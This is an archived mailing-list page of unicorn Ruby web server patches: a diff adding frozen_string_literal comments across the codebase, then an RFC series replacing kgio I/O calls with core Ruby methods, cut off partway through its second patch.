diff --git a/examples/big_app_gc.rb b/examples/big_app_gc.rb
index c1bae10..0baea26 100644
--- a/examples/big_app_gc.rb
+++ b/examples/big_app_gc.rb
@@ -1,2 +1,3 @@
+# frozen_string_literal: false
 # see {Unicorn::OobGC}[https://yhbt.net/unicorn/Unicorn/OobGC.html]
 # Unicorn::OobGC was broken in Unicorn v3.3.1 - v3.6.1 and fixed in v3.6.2
diff --git a/examples/echo.ru b/examples/echo.ru
index e982180..453a5e6 100644
--- a/examples/echo.ru
+++ b/examples/echo.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 #
 # Example application that echoes read data back to the HTTP client.
 # This emulates the old echo protocol people used to run.
diff --git a/examples/logger_mp_safe.rb b/examples/logger_mp_safe.rb
index 05ad3fa..f2c0500 100644
--- a/examples/logger_mp_safe.rb
+++ b/examples/logger_mp_safe.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Multi-Processing-safe monkey patch for Logger
 #
 # This monkey patch fixes the case where "preload_app true" is used and
diff --git a/examples/unicorn.conf.minimal.rb b/examples/unicorn.conf.minimal.rb
index 46fd634..4f96ede 100644
--- a/examples/unicorn.conf.minimal.rb
+++ b/examples/unicorn.conf.minimal.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Minimal sample configuration file for Unicorn (not Rack) when used
 # with daemonization (unicorn -D) started in your working directory.
 #
diff --git a/examples/unicorn.conf.rb b/examples/unicorn.conf.rb
index d90bdc4..5bae830 100644
--- a/examples/unicorn.conf.rb
+++ b/examples/unicorn.conf.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Sample verbose configuration file for Unicorn (not Rack)
 #
 # This configuration file documents many features of Unicorn
diff --git a/ext/unicorn_http/extconf.rb b/ext/unicorn_http/extconf.rb
index 11099cd..de896fe 100644
--- a/ext/unicorn_http/extconf.rb
+++ b/ext/unicorn_http/extconf.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'mkmf'
 
 have_func("rb_hash_clear", "ruby.h") or abort 'Ruby 2.0+ required'
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 564cb30..fb91679 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'etc'
 require 'stringio'
 require 'raindrops'
diff --git a/lib/unicorn/app/old_rails.rb b/lib/unicorn/app/old_rails.rb
index 1e8c41a..54b3e69 100644
--- a/lib/unicorn/app/old_rails.rb
+++ b/lib/unicorn/app/old_rails.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 # This code is based on the original Rails handler in Mongrel
diff --git a/lib/unicorn/app/old_rails/static.rb b/lib/unicorn/app/old_rails/static.rb
index 2257270..cf34e02 100644
--- a/lib/unicorn/app/old_rails/static.rb
+++ b/lib/unicorn/app/old_rails/static.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # This code is based on the original Rails handler in Mongrel
 # Copyright (c) 2005 Zed A. Shaw
diff --git a/lib/unicorn/cgi_wrapper.rb b/lib/unicorn/cgi_wrapper.rb
index d9b7fe5..fb43605 100644
--- a/lib/unicorn/cgi_wrapper.rb
+++ b/lib/unicorn/cgi_wrapper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 # This code is based on the original CGIWrapper from Mongrel
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index b21a01d..3c81596 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'logger'
 
 # Implements a simple DSL for configuring a unicorn server.
diff --git a/lib/unicorn/const.rb b/lib/unicorn/const.rb
index 33ab4ac..8032863 100644
--- a/lib/unicorn/const.rb
+++ b/lib/unicorn/const.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 module Unicorn::Const # :nodoc:
   # default TCP listen host address (0.0.0.0, all interfaces)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index ab3bd6e..a48dab7 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # no stable API here
 require 'unicorn_http'
diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index 0ed0ae3..3634165 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # Writes a Rack response to your client using the HTTP/1.1 specification.
 # You use it by simply doing:
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index ed5bbf1..08fbe40 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # This is the process manager of Unicorn. This manages worker
 # processes which in turn handle the I/O and application process.
diff --git a/lib/unicorn/launcher.rb b/lib/unicorn/launcher.rb
index 78e8f39..bd3324e 100644
--- a/lib/unicorn/launcher.rb
+++ b/lib/unicorn/launcher.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 $stdout.sync = $stderr.sync = true
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index db9f2cb..efd9177 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Strongly consider https://github.com/tmm1/gctools if using Ruby 2.1+
 # It is built on new APIs in Ruby 2.1, so it is more intelligent than
diff --git a/lib/unicorn/preread_input.rb b/lib/unicorn/preread_input.rb
index 12eb3e8..c62cc09 100644
--- a/lib/unicorn/preread_input.rb
+++ b/lib/unicorn/preread_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 module Unicorn
 # This middleware is used to ensure input is buffered to memory
diff --git a/lib/unicorn/select_waiter.rb b/lib/unicorn/select_waiter.rb
index cb84aab..d11ea57 100644
--- a/lib/unicorn/select_waiter.rb
+++ b/lib/unicorn/select_waiter.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # fallback for non-Linux and Linux <4.5 systems w/o EPOLLEXCLUSIVE
 class Unicorn::SelectWaiter # :nodoc:
   def get_readers(ready, readers, timeout) # :nodoc:
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 06ec2b2..986932f 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 require 'socket'
 
diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 9246f73..23a9976 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # When processing uploads, unicorn may expose a StreamInput object under
 # "rack.input" of the Rack environment when
diff --git a/lib/unicorn/tee_input.rb b/lib/unicorn/tee_input.rb
index 2ccc2d9..b3c6535 100644
--- a/lib/unicorn/tee_input.rb
+++ b/lib/unicorn/tee_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Acts like tee(1) on an input input to provide a input-like stream
 # while providing rewindable semantics through a File/StringIO backing
diff --git a/lib/unicorn/tmpio.rb b/lib/unicorn/tmpio.rb
index 0bbf6ec..deecd80 100644
--- a/lib/unicorn/tmpio.rb
+++ b/lib/unicorn/tmpio.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :stopdoc:
 require 'tmpdir'
 
diff --git a/lib/unicorn/util.rb b/lib/unicorn/util.rb
index b826de4..f28d929 100644
--- a/lib/unicorn/util.rb
+++ b/lib/unicorn/util.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'fcntl'
 module Unicorn::Util # :nodoc:
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 4af31be..d2445d5 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require "raindrops"
 
 # This class and its members can be considered a stable interface
diff --git a/setup.rb b/setup.rb
index cf1abd9..96cf75a 100644
--- a/setup.rb
+++ b/setup.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 #
 # setup.rb
 #
diff --git a/t/broken-app.ru b/t/broken-app.ru
index d05d7ab..5966bff 100644
--- a/t/broken-app.ru
+++ b/t/broken-app.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # we do not want Rack::Lint or anything to protect us
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/client_body_buffer_size.ru b/t/client_body_buffer_size.ru
index 44161a5..1a0fb16 100644
--- a/t/client_body_buffer_size.ru
+++ b/t/client_body_buffer_size.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 app = lambda do |env|
   input = env['rack.input']
   case env["PATH_INFO"]
diff --git a/t/detach.ru b/t/detach.ru
index bbd998e..8d35951 100644
--- a/t/detach.ru
+++ b/t/detach.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentType, "text/plain"
 fifo_path = ENV["TEST_FIFO"] or abort "TEST_FIFO not set"
 run lambda { |env|
diff --git a/t/env.ru b/t/env.ru
index 388412e..86c3cfa 100644
--- a/t/env.ru
+++ b/t/env.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env| [ 200, {}, [ env.inspect << "\n" ] ] }
diff --git a/t/fails-rack-lint.ru b/t/fails-rack-lint.ru
index 82bfb5f..8b8b5ec 100644
--- a/t/fails-rack-lint.ru
+++ b/t/fails-rack-lint.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This rack app returns an invalid status code, which will cause
 # Rack::Lint to throw an exception if it is present.  This
 # is used to check whether Rack::Lint is in the stack or not.
diff --git a/t/heartbeat-timeout.ru b/t/heartbeat-timeout.ru
index 3eeb5d6..ccc6a8e 100644
--- a/t/heartbeat-timeout.ru
+++ b/t/heartbeat-timeout.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 headers = { 'content-type' => 'text/plain' }
 run lambda { |env|
diff --git a/t/integration.ru b/t/integration.ru
index 888833a..6df481c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -1,4 +1,5 @@
 #!ruby
+# frozen_string_literal: false
 # Copyright (C) unicorn hackers <unicorn-public@80x24.org>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
 
diff --git a/t/listener_names.ru b/t/listener_names.ru
index edb4e6a..f52c59b 100644
--- a/t/listener_names.ru
+++ b/t/listener_names.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 names = Unicorn.listener_names.inspect # rely on preload_app=true
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index 224cb06..2ae58a8 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'unicorn/oob_gc'
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index 7f40601..5358222 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'unicorn/oob_gc'
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/pid.ru b/t/pid.ru
index f5fd31f..b49b137 100644
--- a/t/pid.ru
+++ b/t/pid.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env| [ 200, {}, [ "#$$\n" ] ] }
diff --git a/t/preread_input.ru b/t/preread_input.ru
index 18af221..5f68fe9 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'digest/md5'
 require 'unicorn/preread_input'
 use Unicorn::PrereadInput
diff --git a/t/reopen-logs.ru b/t/reopen-logs.ru
index c39e8f6..488da85 100644
--- a/t/reopen-logs.ru
+++ b/t/reopen-logs.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env|
diff --git a/t/t0013.ru b/t/t0013.ru
index 48a3a34..e425093 100644
--- a/t/t0013.ru
+++ b/t/t0013.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 app = lambda do |env|
diff --git a/t/t0014.ru b/t/t0014.ru
index b0bd2b7..686d214 100644
--- a/t/t0014.ru
+++ b/t/t0014.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 app = lambda do |env|
diff --git a/t/t0301.ru b/t/t0301.ru
index ce68213..54929b1 100644
--- a/t/t0301.ru
+++ b/t/t0301.ru
@@ -1,4 +1,5 @@
 #\-N --debug
+# frozen_string_literal: false
 run(lambda do |env|
   case env['PATH_INFO']
   when '/vars'
diff --git a/test/aggregate.rb b/test/aggregate.rb
index 5eebbe5..0f32b2f 100755
--- a/test/aggregate.rb
+++ b/test/aggregate.rb
@@ -1,5 +1,6 @@
 #!/usr/bin/ruby -n
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 BEGIN { $tests = $assertions = $failures = $errors = 0 }
 
diff --git a/test/benchmark/dd.ru b/test/benchmark/dd.ru
index 111fa2e..5bd2739 100644
--- a/test/benchmark/dd.ru
+++ b/test/benchmark/dd.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This benchmark is the simplest test of the I/O facilities in
 # unicorn.  It is meant to return a fixed-sized blob to test
 # the performance of things in Unicorn, _NOT_ the app.
diff --git a/test/benchmark/ddstream.ru b/test/benchmark/ddstream.ru
index b14c973..fd40ced 100644
--- a/test/benchmark/ddstream.ru
+++ b/test/benchmark/ddstream.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This app is intended to test large HTTP responses with or without
 # a fully-buffering reverse proxy such as nginx. Without a fully-buffering
 # reverse proxy, unicorn will be unresponsive when client count exceeds
diff --git a/test/benchmark/readinput.ru b/test/benchmark/readinput.ru
index c91bec3..95c0226 100644
--- a/test/benchmark/readinput.ru
+++ b/test/benchmark/readinput.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This app is intended to test large HTTP requests with or without
 # a fully-buffering reverse proxy such as nginx. Without a fully-buffering
 # reverse proxy, unicorn will be unresponsive when client count exceeds
diff --git a/test/benchmark/stack.ru b/test/benchmark/stack.ru
index fc9193f..17a565b 100644
--- a/test/benchmark/stack.ru
+++ b/test/benchmark/stack.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 run(lambda { |env|
   body = "#{caller.size}\n"
   h = {
diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 8494452..807f724 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # Don't add to this file, new tests are in Perl 5. See t/README
 FLOCK_PATH = File.expand_path(__FILE__)
 require './test/test_helper'
diff --git a/test/test_helper.rb b/test/test_helper.rb
index d86f83b..0bf3c90 100644
--- a/test/test_helper.rb
+++ b/test/test_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_ccc.rb b/test/unit/test_ccc.rb
index f518230..a0a2bff 100644
--- a/test/unit/test_ccc.rb
+++ b/test/unit/test_ccc.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'socket'
 require 'unicorn'
 require 'io/wait'
diff --git a/test/unit/test_configurator.rb b/test/unit/test_configurator.rb
index 1298f0e..1a89aca 100644
--- a/test/unit/test_configurator.rb
+++ b/test/unit/test_configurator.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'tempfile'
diff --git a/test/unit/test_droplet.rb b/test/unit/test_droplet.rb
index 81ad82b..4b2d2d0 100644
--- a/test/unit/test_droplet.rb
+++ b/test/unit/test_droplet.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'test/unit'
 require 'unicorn'
 
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 697af44..adcc84f 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index 425d5ad..fd47246 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'digest/md5'
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 53ae944..9d1b350 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index 7ffa48f..5a2252f 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_signals.rb b/test/unit/test_signals.rb
index 6c48754..49ff3c7 100644
--- a/test/unit/test_signals.rb
+++ b/test/unit/test_signals.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index a446f06..4363474 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'tempfile'
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 7986ca7..7ee98e4 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'digest/sha1'
diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 607ce87..8f05c77 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'digest/sha1'
diff --git a/test/unit/test_util.rb b/test/unit/test_util.rb
index bc7b233..ce53b86 100644
--- a/test/unit/test_util.rb
+++ b/test/unit/test_util.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'tempfile'
diff --git a/test/unit/test_waiter.rb b/test/unit/test_waiter.rb
index 0995de2..a20994b 100644
--- a/test/unit/test_waiter.rb
+++ b/test/unit/test_waiter.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'test/unit'
 require 'unicorn'
 require 'unicorn/select_waiter'
diff --git a/unicorn.gemspec b/unicorn.gemspec
index e7e3ef7..36700a8 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 manifest = File.exist?('.manifest') ?
   IO.readlines('.manifest').map!(&:chomp!) : `git ls-files`.split("\n")
 

^ permalink raw reply related	[relevance 4%]

* [RFC 0-3/3] depend on Ruby 2.5+, eliminate kgio
@ 2023-09-05  9:44  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-09-05  9:44 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1658 bytes --]

Explanation follows (the bulk of the work is in patch 2/3).

I wrote patch 1/3 over 4 years ago since it was simple and
didn't rely on "newer" Ruby 2.3 features.  Patch 2/3 completes
the change and actually depends on 2.5+, while patch 3/3 updates
the gemspec, docs and dependencies for Ruby 2.5+.

I haven't actually used Ruby 2.5 in a while; I'm still on
Ruby 2.7 since that's what I have in Debian bullseye
(oldstable).

Patch 2/3 could use an extra set of eyes since it's fairly big,
but it passes all tests.

Note: I can't benchmark anything since I have limited (shared)
hardware.

Eric Wong (3):
  remove kgio from all read(2) and write(2) wrappers
  kill off remaining kgio uses
  update dependency to Ruby 2.5+

 HACKING                         |  2 +-
 README                          |  2 +-
 lib/unicorn.rb                  |  3 +-
 lib/unicorn/http_request.rb     | 18 ++++-----
 lib/unicorn/http_server.rb      | 38 +++++++----------
 lib/unicorn/oob_gc.rb           |  4 +-
 lib/unicorn/socket_helper.rb    | 50 +++--------------------
 lib/unicorn/stream_input.rb     | 20 +++++----
 lib/unicorn/worker.rb           | 10 ++---
 lib/unicorn/write_splat.rb      |  7 ----
 t/README                        |  2 +-
 t/oob_gc.ru                     |  3 --
 t/oob_gc_path.ru                |  3 --
 test/unit/test_request.rb       | 47 ++++++++-------------
 test/unit/test_socket_helper.rb | 72 +++++++--------------------------
 test/unit/test_stream_input.rb  |  2 +-
 test/unit/test_tee_input.rb     |  2 +-
 unicorn.gemspec                 |  5 +--
 18 files changed, 87 insertions(+), 203 deletions(-)
 delete mode 100644 lib/unicorn/write_splat.rb

[-- Attachment #2: 0001-remove-kgio-from-all-read-2-and-write-2-wrappers.patch --]
[-- Type: text/x-diff, Size: 5330 bytes --]

From 36ba7f971c571031101c0b718724bdcb06dd7e03 Mon Sep 17 00:00:00 2001
From: Eric Wong <e@80x24.org>
Date: Sun, 26 May 2019 22:15:44 +0000
Subject: [RFC 1/3] remove kgio from all read(2) and write(2) wrappers

It's fairly easy given unicorn was designed with synchronous I/O
in mind.  The overhead of backtraces from EOFError on
readpartial should be rare given our requirement to only accept
requests from fast, reliable clients on LAN (e.g. nginx or
yet-another-horribly-named-server).
---
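  A minimal sketch of the substitution (not part of the patch; "sock"
  is assumed to be a connected client socket): kgio_read returned nil
  at EOF, while readpartial raises EOFError, so callers rescue instead
  of checking for nil.

    buf = ''.b
    begin
      # was: sock.kgio_read(16384, buf) or eof!   (nil at EOF)
      sock.readpartial(16384, buf)    # raises EOFError at EOF instead
    rescue EOFError
      # client went away; same outcome as the old nil-return path
    end
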
 lib/unicorn/http_request.rb |  4 ++--
 lib/unicorn/http_server.rb  |  8 +++++---
 lib/unicorn/stream_input.rb | 20 ++++++++++++--------
 lib/unicorn/worker.rb       |  4 ++--
 4 files changed, 21 insertions(+), 15 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index e3ad592..8bca60a 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -74,11 +74,11 @@ def read(socket)
     e['REMOTE_ADDR'] = socket.kgio_addr
 
     # short circuit the common case with small GET requests first
-    socket.kgio_read!(16384, buf)
+    socket.readpartial(16384, buf)
     if parse.nil?
       # Parser is not done, queue up more data to read and continue parsing
       # an Exception thrown from the parser will throw us out of the loop
-      false until add_parse(socket.kgio_read!(16384))
+      false until add_parse(socket.readpartial(16384))
     end
 
     check_client_connection(socket) if @@check_client_connection
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f1b4a54..2f1eb1b 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -389,12 +389,13 @@ def master_sleep(sec)
     # the Ruby itself and not require a separate malloc (on 32-bit MRI 1.9+).
     # Most reads are only one byte here and uncommon, so it's not worth a
     # persistent buffer, either:
-    @self_pipe[0].kgio_tryread(11)
+    @self_pipe[0].read_nonblock(11, exception: false)
   end
 
   def awaken_master
     return if $$ != @master_pid
-    @self_pipe[1].kgio_trywrite('.') # wakeup master process from select
+    # wakeup master process from select
+    @self_pipe[1].write_nonblock('.', exception: false)
   end
 
   # reaps all unreaped workers
@@ -565,7 +566,8 @@ def handle_error(client, e)
       500
     end
     if code
-      client.kgio_trywrite(err_response(code, @request.response_start_sent))
+      code = err_response(code, @request.response_start_sent)
+      client.write_nonblock(code, exception: false)
     end
     client.close
   rescue
diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 41d28a0..9246f73 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -49,8 +49,7 @@ def read(length = nil, rv = '')
         to_read = length - @rbuf.size
         rv.replace(@rbuf.slice!(0, @rbuf.size))
         until to_read == 0 || eof? || (rv.size > 0 && @chunked)
-          @socket.kgio_read(to_read, @buf) or eof!
-          filter_body(@rbuf, @buf)
+          filter_body(@rbuf, @socket.readpartial(to_read, @buf))
           rv << @rbuf
           to_read -= @rbuf.size
         end
@@ -61,6 +60,8 @@ def read(length = nil, rv = '')
       read_all(rv)
     end
     rv
+  rescue EOFError
+    return eof!
   end
 
   # :call-seq:
@@ -83,9 +84,10 @@ def gets
     begin
       @rbuf.sub!(re, '') and return $1
       return @rbuf.empty? ? nil : @rbuf.slice!(0, @rbuf.size) if eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
-      filter_body(once = '', @buf)
+      filter_body(once = '', @socket.readpartial(@@io_chunk_size, @buf))
       @rbuf << once
+    rescue EOFError
+      return eof!
     end while true
   end
 
@@ -107,14 +109,15 @@ def each
   def eof?
     if @parser.body_eof?
       while @chunked && ! @parser.parse
-        once = @socket.kgio_read(@@io_chunk_size) or eof!
-        @buf << once
+        @buf << @socket.readpartial(@@io_chunk_size)
       end
       @socket = nil
       true
     else
       false
     end
+  rescue EOFError
+    return eof!
   end
 
   def filter_body(dst, src)
@@ -127,10 +130,11 @@ def read_all(dst)
     dst.replace(@rbuf)
     @socket or return
     until eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
-      filter_body(@rbuf, @buf)
+      filter_body(@rbuf, @socket.readpartial(@@io_chunk_size, @buf))
       dst << @rbuf
     end
+  rescue EOFError
+    return eof!
   ensure
     @rbuf.clear
   end
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 5ddf379..ad5814c 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -65,7 +65,7 @@ def soft_kill(sig) # :nodoc:
     end
     # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
     # Do not care in the odd case the buffer is full, here.
-    @master.kgio_trywrite([signum].pack('l'))
+    @master.write_nonblock([signum].pack('l'), exception: false)
   rescue Errno::EPIPE
     # worker will be reaped soon
   end
@@ -73,7 +73,7 @@ def soft_kill(sig) # :nodoc:
   # this only runs when the Rack app.call is not running
   # act like a listener
   def kgio_tryaccept # :nodoc:
-    case buf = @to_io.kgio_tryread(4)
+    case buf = @to_io.read_nonblock(4, exception: false)
     when String
       # unpack the buffer and trigger the signal handler
       signum = buf.unpack('l')

[-- Attachment #3: 0002-kill-off-remaining-kgio-uses.patch --]
[-- Type: text/x-diff, Size: 25476 bytes --]

From 03ec6e69fc6219a40aa8db368abe53017cd164e3 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Tue, 5 Sep 2023 06:43:20 +0000
Subject: [RFC 2/3] kill off remaining kgio uses

kgio is an extra download and shared object which costs users
bandwidth, disk space, startup time and memory.  Ruby 2.3+
provides `Socket#accept_nonblock(exception: false)' support
in addition to `exception: false' support in IO#*_nonblock
methods from Ruby 2.1.

We no longer distinguish between TCPServer and UNIXServer as
separate classes internally; instead favoring the `Socket' class
of Ruby for both.  This allows us to use `Socket#accept_nonblock'
and get a populated `Addrinfo' object off accept4(2)/accept(2)
without resorting to a getpeername(2) syscall (kgio avoided
getpeername(2) in the same way).

The downside is there's more Ruby-level argument passing and
stack usage on our end with HttpRequest#read_headers (formerly
HttpRequest#read).  I chose this tradeoff since advancements in
Ruby itself can theoretically mitigate the cost of argument
passing, while syscalls are a high fixed cost given modern CPU
vulnerability mitigations.

Note: no benchmarks have been run since I don't have a suitable
system.
---
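  A rough, self-contained illustration of the accept path described
  above (names here are illustrative, not lifted from the patch):
  Socket#accept_nonblock(exception: false) returns either
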